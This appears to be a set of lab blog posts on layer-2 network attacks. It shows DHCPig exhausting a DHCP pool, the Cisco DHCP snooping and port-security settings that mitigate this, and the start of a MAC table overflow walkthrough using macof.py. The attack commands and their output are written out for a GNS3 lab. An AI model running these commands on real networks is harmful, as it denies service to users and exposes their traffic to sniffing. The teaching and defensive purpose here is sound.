<p>A well-implemented <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation attack can have far more impact.</p>
<p>This time the attacker will not attempt to temporarily drown the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server
under tens of thousands <span class="caps">DISCOVER</span> requests seconds.
He will instead:</p>
<ol>
<li>Send the <span class="caps">DISCOVER</span> requests at a relatively slower rate, allowing the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
to properly handle them.</li>
<li>Keep track of sent <span class="caps">DISCOVER</span> and wait for the matching <span class="caps">OFFER</span> replies.</li>
<li>Send clean <span class="caps">REQUEST</span> messages in reaction to the <span class="caps">OFFER</span>, confirming the
<span class="caps">IP</span> lease.</li>
</ol>
<p>A <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server usually has a pool of a few hundreds, maybe thousands of
available <span class="caps">IP</span>.
With such attack, this pool will fill-up in very few time, meaning that there
will be no available <span class="caps">IP</span> anymore to distribute to newly connected devices,
effectively preventing them from accessing the network.</p>
<p><a href="https://github.com/kamorin/DHCPig" rel="external" title="DHCPig GitHub page">DHCPig</a> proposes a good implementation of this attack, with configurable
retries, timeouts and threads to match various environments.
It offer even more sweeties, in particular:</p>
<ul>
<li>
<p>It can attempt to unregister live neighbors by forging <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">RELEASE</span>
messages sending them to the the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
This allows to prevent hosts with a currently assigned <span class="caps">IP</span> to renew it.</p>
</li>
<li>
<p>Once there is no more free leases, it can disconnect all Windows machines
by simulating <span class="caps">IP</span> addresses conflicts (this results in the Windows
machines dropping their current address to fetch a new one from the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
server, alas at that time there is no more <span class="caps">IP</span> addresses available there…).</p>
</li>
<li>
<p>As a weak security measure, some routers attempt to detect such attacks by
probing the requester to ensure it is a real device.
DHCPig replies to such probes.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Sadly I did not manage to get the <span class="caps">RELEASE</span>-based attack described in the
first bullet to work, the legitimate client remaining the owner of the
<span class="caps">IP</span> address.
I don’t know at this time if this is a limitation of the <span class="caps">IOS</span>-based <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
server or a bug in DHCPig.</p>
<p>To reproduce this attack in the lab, it is therefore recommended to begin
with a freshly restarted <em>R1</em> and <em>Atacker</em> host and keep the <em>User_1</em>
host off.</p>
</div>
<p>To start the attack, simply provide the network interface to use to DHCPig:</p>
<div class="codehilite"><pre><span class="hll"><span class="gp">root@kali:~#</span> python ./pig.py eth0
</span><span class="go">[ -- ] [INFO] - using interface eth0</span>
<span class="go">[DBG ] Thread 0 - (Sniffer) READY</span>
<span class="go">[DBG ] Thread 1 - (Sender) READY</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[ ?? ] waiting for first DHCP Server response</span>
<span class="go">[<---] DHCP_Offer c2:01:0b:de:00:00 0.0.0.0 IP: 192.168.1.100 for MAC=[de:ad:0e:7c:60:f3]</span>
<span class="go">[--->] DHCP_Request 192.168.1.100</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">... skipped ...</span>
<span class="go">[ -- ] timeout waiting on dhcp packet count 3</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[ ?? ] waiting for DHCP pool exhaustion...</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[ -- ] timeout waiting on dhcp packet count 4</span>
<span class="go">[ ?? ] waiting for DHCP pool exhaustion...</span>
<span class="go">[ -- ] [DONE] DHCP pool exhausted!</span>
<span class="gp">root@kali:~#</span>
</pre></div>
<p>Once the attack has ended, the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> pool is indeed full as all of the 100
available <span class="caps">IP</span> addresses are now “leased”:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">show</span> ip dhcp pool VLAN1
<span class="go">Pool VLAN1 :</span>
<span class="go">Utilization mark (high/low) : 100 / 0</span>
<span class="go">Subnet size (first/next) : 0 / 0</span>
<span class="go">Total addresses : 254</span>
<span class="hll"><span class="go">Leased addresses : 100</span>
</span><span class="go">Pending event : none</span>
<span class="go">1 subnet is currently in the pool :</span>
<span class="go">Current index IP address range Leased addresses</span>
<span class="go">0.0.0.0 192.168.1.1 - 192.168.1.254 100</span>
<span class="gp">R1#</span>
</pre></div>
<p>Starting <em>User_1</em> host, it is indeed unable to acquire an <span class="caps">IP</span> address and cannot
join the network:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> ifconfig eth0
<span class="go">eth0 Link encap:Ethernet HWaddr 00:01:93:B7:01:00</span>
<span class="go"> inet6 addr: fe80::201:93ff:feb7:100/64 Scope:Link</span>
<span class="go"> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1</span>
<span class="go"> RX packets:0 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> TX packets:12 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> collision:0 txqueuelen:1000</span>
<span class="go"> RXbytes:0 (0/0 KiB) TX bytes:2528 (2.4 KiB)</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
<p>As stated earlier, <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> lease time may vary a lot depending on the environments,
from a few dozen of minutes to a few weeks.
In most case the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server will require a manual intervention for the network
to get back into a working state.</p>
<h3 id="mitigation"><a class="toclink" href="#mitigation">Mitigation</a></h3>
<p>To prevent these attacks you must enable <em>both</em> <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping and port-security.</p>
<h4 id="dhcp-snooping"><a class="toclink" href="#dhcp-snooping"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Snooping</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping needs to be enabled on a per-<span class="caps">VLAN</span> basis on the access layer
switches and takes cares of several things:</p>
<ul>
<li>
<p>It creates a distinction between trusted ports and untrusted ports.</p>
<p>Clients are connected to untrusted ports and the trusted ports point toward
the network infrastructure and the legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server(s).</p>
</li>
<li>
<p>Invalid <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> messages received on untrusted ports are dropped.</p>
<p>A message can be deemed invalid due to various reasons like a mismatch
between the <span class="caps">MAC</span> addresses mentioned in the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> message and as the Ethernet
frame sender, a server message coming from an untrusted port or a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
message referencing a conversation currently happening on a different port.</p>
</li>
<li>
<p>Clients <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> multicast messages are forwarded only through trusted ports.</p>
<p>A client will therefore not receive <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> broadcasts from other clients anymore.</p>
</li>
<li>
<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> messages are rate-limited.</p>
</li>
<li>
<p>The switch maintains a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping database.</p>
<p>This database tracks various information: client’s <span class="caps">MAC</span> address, client’s <span class="caps">IP</span>
address as assigned by the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, client’s <span class="caps">VLAN</span>, remaining lease time
and the port the client is connected to.</p>
<p>We will see in the next post that this database can also used to implement
other security features.</p>
</li>
</ul>
<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping will add the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> option 82
(<em>”<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Relay Agent Information Option”</em>) on <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> messages that went through it
(messages coming from untrusted ports with this option already set are
considered invalid).
By default the <span class="caps">IOS</span>-based <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server will ignore such messages, so you must
first modify the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server configuration on <em>R1</em>:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">R1(config)#</span><span class="k">ip</span> dhcp relay information trust-all
</span><span class="gp">R1(config)#</span><span class="nb">end</span>
<span class="gp">R1#</span>
<span class="gt">*Mar 1 00:49:13.755: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">R1#</span><span class="k">copy</span> run start
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">[OK]</span>
<span class="gp">R1#</span>
</pre></div>
<p>Then you can enable <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping on all access layer switches:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU3(config)#</span><span class="c1">! Set the trusted port first to avoid any service interruption!</span>
<span class="gp">IOU3(config)#</span><span class="k">interface</span><span class="s"> ethernet 0/0</span>
<span class="hll"><span class="gp">IOU3(config-if)#</span><span class="k">ip</span> dhcp snooping trust
</span><span class="gp">IOU3(config-if)#</span><span class="nb">exit</span>
<span class="hll"><span class="gp">IOU3(config)#</span><span class="k">ip</span> dhcp snooping
</span><span class="hll"><span class="gp">IOU3(config)#</span><span class="k">ip</span> dhcp snooping vlan <span class="s">1-2</span>
</span><span class="gp">IOU3(config)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 29 17:00:53.321: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span><span class="k">show</span> ip dhcp snooping
<span class="go">Switch DHCP snooping is enabled</span>
<span class="go">DHCP snooping is configured on following VLANs:</span>
<span class="go">1-2</span>
<span class="go">DHCP snooping is operational on following VLANs:</span>
<span class="go">1-2</span>
<span class="go">DHCP snooping is configured on the following L3 Interfaces:</span>
<span class="go">Insertion of option 82 is enabled</span>
<span class="go">circuit-id default format: vlan-mod-port</span>
<span class="go">remote-id: aabb.cc00.0500 (MAC)</span>
<span class="go">Option 82 on untrusted port is not allowed</span>
<span class="go">Verification of hwaddr field is enabled</span>
<span class="go">Verification of giaddr field is enabled</span>
<span class="go">DHCP snooping trust/rate is configured on the following Interfaces:</span>
<span class="go">Interface Trusted Allow option Rate limit (pps)</span>
<span class="go">----------------------- ------- ------------ ----------------</span>
<span class="go">Ethernet0/0 yes yes unlimited</span>
<span class="go">Custom circuit-ids:</span>
<span class="gp">IOU3#</span><span class="k">copy</span> run start
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">Compressed configuration from 1624 bytes to 936 bytes[OK]</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>After having enabled <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping:</p>
<ul>
<li>
<p>The <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> spoofing attack doesn’t work anymore as Ettercap doesn’t receive
any broadcasted <span class="caps">DISCOVERY</span> or <span class="caps">REQUEST</span> messages to reply to.</p>
<p>There is no error message anywhere, the attacker is just deaf to <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
discussions occurring on other ports.</p>
</li>
<li>
<p>The <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation attack doesn’t work anymore, but this is more due to
a current limitation of the tool than anything else.</p>
<p>DHCPig messages are dropped by the switch which raises the following
error message:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 29 17:10:22.200: %DHCP_SNOOPING-5-DHCP_SNOOPING_MATCH_MAC_FAIL: DHCP_SNOOPING drop message because the chaddr doesn't match source mac, message type: DHCPDISCOVER, chaddr: dead.287e.8729, MAC sa: 0001.93e9.0e00</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>While DHCPig correctly fakes the <span class="caps">MAC</span> address in the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> message, it misses
to fake the sender <span class="caps">MAC</span> address in the Ethernet frame, resulting in a
mismatch and all its messages being dropped as invalid.</p>
</li>
<li>
<p>Yersinia however correctly sets the Ethernet layer source <span class="caps">MAC</span> addres to
match the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> message <span class="caps">MAC</span> address, therefore its <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVERY</span> flood
attack remain possible despite having enabled <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping.</p>
<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping rate limiting is triggered by this attack:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 29 17:12:53.669: %DHCP_SNOOPING-4-QUEUE_FULL: Fail to enqueue DHCP packet into processing queue: dhcp_snoop_pakQ, the queue is most likely full and packet will be dropped.</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>However the amount of packets remaining allowed is still sufficient to
effectively <abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> our small lab <span class="caps">IOS</span>-based <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.</p>
</li>
</ul>
<h4 id="port-security"><a class="toclink" href="#port-security">Port security</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The attacks that managed to slip through <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping rely on the ability for
the attacker to be able to simulate a large number of devices bearing different
<span class="caps">MAC</span> address.</p>
<p>For those of you who have read the <a href="/posts/2017/10/25/mac-address-table-overflow/" title="MAC address table overflow">previous article</a> from this series about
<span class="caps">MAC</span> address table overflow, this may ring a bell.
Indeed, for a complete protection against <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>-based attacks, in addition to
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping you must also enable Port Security.</p>
<p>Enabling Port Security is covered in the <a href="/posts/2017/10/25/mac-address-table-overflow/#mitigation" title="MAC address table overflow: mitigation">previous post</a>.</p>
<p>Now even Yersinia’s <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> flooding attack gets successfully blocked:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 29 18:31:00.024: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 29 18:31:00.024: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address 1009.c153.845c on port Ethernet1/0.</span>
<span class="gt">*Oct 29 18:31:01.024: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 29 18:31:02.024: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Your lab is now safe… until the next post ;) !</p>
<div class="footnote">
<hr/>
<ol>
<li id="fn-ideal-world">
<p>Well, I can easily imagine a tool providing the best of both
worlds. First simulate a few devices to obtain a few IPs from the legitimate
server and maintain their leases so they remain valid, free and won’t be
allocated to other devices in the future. Then fake the <span class="caps">OFFER</span> packets and
distribute these addresses to the clients with custom network settings. <a class="footnote-backref" href="#fnref-ideal-world" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
<li id="fn-configurable-leases">
<p>It would be nice for <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> spoofing tools to let the
attacker configure the lease time to match the estimated attack duration.
This would allow intercepted clients to gracefully switch to the legitimate
network configuration at the end of the attack with little to no disruption.
Yersinia curses interface propose such settings in its <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> spoofing
attack, but this module seems incompletely implemented: present only in
curses, very rough interface, don’t seem to do anything. <a class="footnote-backref" href="#fnref-configurable-leases" title="Jump back to footnote 2 in the text">↩</a></p>
</li>
<li id="fn-NAT">
<p>In this case, Ettercap could even be made to distribute IPs from a
completely different and unused subnet, thus avoiding any <span class="caps">IP</span> range conflict.
Ettercap doesn’t allow that but I have yet to check if <a href="https://github.com/byt3bl33d3r/MITMf" rel="external" title="MITMf GitHub page">MITMf</a>, another
<abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> tool supporting <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server spoofing, support this either by itself or
by relying on the standard Linux IPTables to do the <span class="caps">NAT</span> stuff. <a class="footnote-backref" href="#fnref-NAT" title="Jump back to footnote 3 in the text">↩</a></p>
</li>
</ol>
</div>MAC address table overflow2017-10-25T00:00:00+02:002017-10-25T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-25:/posts/2017/10/25/mac-address-table-overflow/<p>The main practical difference between a legacy hub and a switch is that the
switch will do its best to forward ethernet frames only on the port allowing to
reach the <em>recipient</em>, it won’t blindly forward everything everywhere as
as a dumb hub would do.</p>
<p>To achieve this, upon reception of a frame the switch stores the <em>senders</em> <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
address associated to its input port in an internal memory, usually implemented
as a <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr> table.
Thanks to this information, would a packet have the same address as <em>recipient</em>,
the switch will now forward this packet only to this port and not the other ones.</p>
<p>I already wrote a more focused article on <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow within the context
of <span class="caps">GNS3</span> simulated environments, which resulted in patch being submitted
upstream and initiated the development of the <code>macof.py</code> tool.
The original article is <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/" title="How to run a CAM table overflow attack in GNS3">available here</a>.</p>
<p>In this article I detailed …</p><p>The main practical difference between a legacy hub and a switch is that the
switch will do its best to forward ethernet frames only on the port allowing to
reach the <em>recipient</em>, it won’t blindly forward everything everywhere as
as a dumb hub would do.</p>
<p>To achieve this, upon reception of a frame the switch stores the <em>senders</em> <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
address associated to its input port in an internal memory, usually implemented
as a <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr> table.
Thanks to this information, would a packet have the same address as <em>recipient</em>,
the switch will now forward this packet only to this port and not the other ones.</p>
<p>I already wrote a more focused article on <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow within the context
of <span class="caps">GNS3</span> simulated environments, which resulted in patch being submitted
upstream and initiated the development of the <code>macof.py</code> tool.
The original article is <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/" title="How to run a CAM table overflow attack in GNS3">available here</a>.</p>
<p>In this article I detailed a classical switch implementation as follow:</p>
<ol>
<li>
<p>The switch receives an incoming packet on some port,</p>
</li>
<li>
<p>The switch then checks if the source <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address is already stored in its
<abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table.</p>
<ul>
<li>If it isn’t and there is a free slot, it records this new <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address
associated to its incoming port.</li>
<li>If the address is already present but associated to another port, it
updates the record with the new port.</li>
<li>In all cases this is also the occasion to reset the aging timer
associated to this entry.</li>
</ul>
</li>
<li>
<p>The switch then checks if the destination <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address is already stored in
the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table.</p>
<ul>
<li>If it is, then this is all good and the switch outputs the packet on
the interface associated to the matching <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr> table entry.</li>
<li>If it isn’t, the switch outputs the packet on all interfaces except the
incoming one (all interfaces belonging to the same <span class="caps">VLAN</span> + the trunk
ports as long as this <span class="caps">VLAN</span> is not pruned).</li>
</ul>
</li>
<li>
<p>As a separate process the switch regularly deletes older entries where the
aging timer went over a certain threshold (usually at least several minutes
on real gear, hardcoded to 30 seconds in the case of the Dynamips emulated
<span class="caps">NM</span>-<span class="caps">16ESW</span> router extension).</p>
</li>
</ol>
<p>This works well… until the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table gets full.
In this case new entries corresponding to new sources addresses cannot be
added anymore into the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table.
When incoming frames refer to these new sources addresses as recipient, the
switch therefore has no other choice than falling back on the second bullet and
forward the frames on all ports.</p>
<p><abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table are made large enough to prevent this situation to happen
under normal circumstances (usually 1000 or 2000 entries for desktop switches
and 5000 to 16000 entries for common enterprise ones).
However, a malicious user may send a large number of packets, each bearing
different source <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address, which will artificially fill up switches <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
address tables, thus forcing them into this fall-back behavior.</p>
<p>This is this attack and the way to prevent it that we will see in detail.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="MAC table overflow topoloy" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/topology.png"/></a></span></p>
<p>This articles relies on the same topology as the rest of the series.
If you didn’t read the <a href="/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/" title="Practical network layer 2 exploitation: introduction">introduction post</a>, do it now.</p>
<p>For this lab we will use the <em>Users</em> and <em>Servers</em> <span class="caps">VLAN</span>.
The <em>Admins</em> <span class="caps">VLAN</span> will not be involved.</p>
<p>As per the tools, we will use <a href="https://github.com/WhiteWinterWolf/macof.py" rel="external" title="macof.py (GitHub)">macof.py</a>, <a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a> and a browser with
a plugin allowing to edit the cookies (here I will use <a href="https://www.mozilla.org/gd/firefox/" rel="external" title="Firefox project homepage">Firefox</a> with
the <a href="https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/" rel="external" title="Cookies Manager+ (Firefox Add-ons)">Cookies Manager+</a> plugin).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>An Internet access allowing to download missing tools can be built for your
<em>Attacker</em> node in <span class="caps">GNS3</span> by adding a <em>Cloud</em> node to your topology and
temporarily connecting the <em>Attacker</em> to it.</p>
</div>
<h3 id="initial-state"><a class="toclink" href="#initial-state">Initial state</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Initially, <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables only contains the minimum information allowing
the switches to forward their packets correctly.
Given the size of our lab network, this is not much information:</p>
<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> mac-address-table count
<span class="go">NM Slot: 1</span>
<span class="go">--------------</span>
<span class="hll"><span class="go">Dynamic Address Count: 1</span>
</span><span class="go">Secure Address (User-defined) Count: 0</span>
<span class="go">Static Address (User-defined) Count: 0</span>
<span class="go">System Self Address Count: 1</span>
<span class="go">Total MAC addresses: 2</span>
<span class="hll"><span class="go">Maximum MAC addresses: 8192</span>
</span><span class="gp">ESW2#</span><span class="k">show</span> mac-address-table dynamic
<span class="go">Non-static Address Table:</span>
<span class="go">Destination Address Address Type VLAN Destination Port</span>
<span class="go">------------------- ------------ ---- --------------------</span>
<span class="hll"><span class="go">c201.068b.0000 Dynamic 3 FastEthernet1/0</span>
</span>
<span class="gp">ESW2#</span>
</pre></div>
<p>Here <em><span class="caps">ESW2</span></em> only has one entry: the <em>R1</em> router.
Also note that the table may contain up to a maximum of 8192 <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> addresses.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>If the counter is zero, ensure there is a minimum activity on the network
for instance by pinging <em>Server_1</em> from the <em>Attacker</em> machine.</p>
<p>Moreover, depending on the device, <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table information may be
available below the <code>show mac-address-table</code> or the <code>show mac address-table</code>
section.</p>
</div>
<h3 id="the-attack-stages"><a class="toclink" href="#the-attack-stages">The attack stages</a></h3>
<h4 id="mac-table-overflow"><a class="toclink" href="#mac-table-overflow"><abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The traditional tool for <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow attack is <code>macof</code> from the
<a href="https://www.monkey.org/~dugsong/dsniff/" rel="external" title="dsniff project homepage">dsniff</a> project.
However this tool is old, seemingly unmaintained (last update in 2000) and I
find it quite inefficient for the task.</p>
<p>I therefore decided to build my own alternative, <code>macof.py</code>, <a href="https://github.com/WhiteWinterWolf/macof.py" rel="external" title="macof.py (GitHub)">available here</a>.</p>
<p>Usually you should be able to run <code>./macof.py</code> without any parameters to use the
default settings.
However, this attack is quite intense, specially on home virtual labs, so to
create the best conditions you may need to adapt default settings a little:</p>
<ul>
<li>
<p>We have seen previously that our router-based switch has a <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address
table limited to 8192 entries, we will therefore not bother with the default
of creating 20000 <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> entries but limit ourselves to this number.</p>
</li>
<li>
<p>We will also slow down packets sending, first sending 3000 packets per
second to fill the switches <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> tables and then around one packet per millisecond.</p>
<p>We won’t be able to slow the refresh much in the virtual lab compared to
real gear because the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address aging-time in Dynamips’ <span class="caps">NM</span>-<span class="caps">16ESW</span>
implementation is hardcoded to a very low value (30 seconds, while the
default on real gear is 5 minutes).</p>
</li>
</ul>
<p>Here is the command I will use:</p>
<div class="codehilite"><pre><span class="gp">root@kali:~#</span> ./macof.py -c <span class="m">8192</span> -f <span class="m">3000</span> -w 1
<span class="go">macof.py <https://www.whitewinterwolf.com/projects/></span>
<span class="go">* Pre-generating 8192 packets...</span>
<span class="go">* Sending 3000 packets per second, looping 1 times.</span>
<span class="go">Actual: 8192 packets (540672 bytes) sent in 2.73 seconds</span>
<span class="go">Rated: 198020.1 Bps, 1.58 Mbps, 3000.30 pps</span>
<span class="go">Flows: 8192 flows, 3000.30 fps, 8192 flow packets, 0 non-flow</span>
<span class="go">Statistics for network device: eth0</span>
<span class="go"> Successful packets: 8192</span>
<span class="go"> Failed packets: 0</span>
<span class="go"> Truncated packets: 0</span>
<span class="go"> Retried packets (ENOBUFS): 0</span>
<span class="go"> Retried packets (EAGAIN): 0</span>
<span class="go">* Sending one packet every 1 milliseconds, press Ctrl+C to terminate.</span>
</pre></div>
<p>Wait a few seconds, switches <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr> tables should now be filled up:</p>
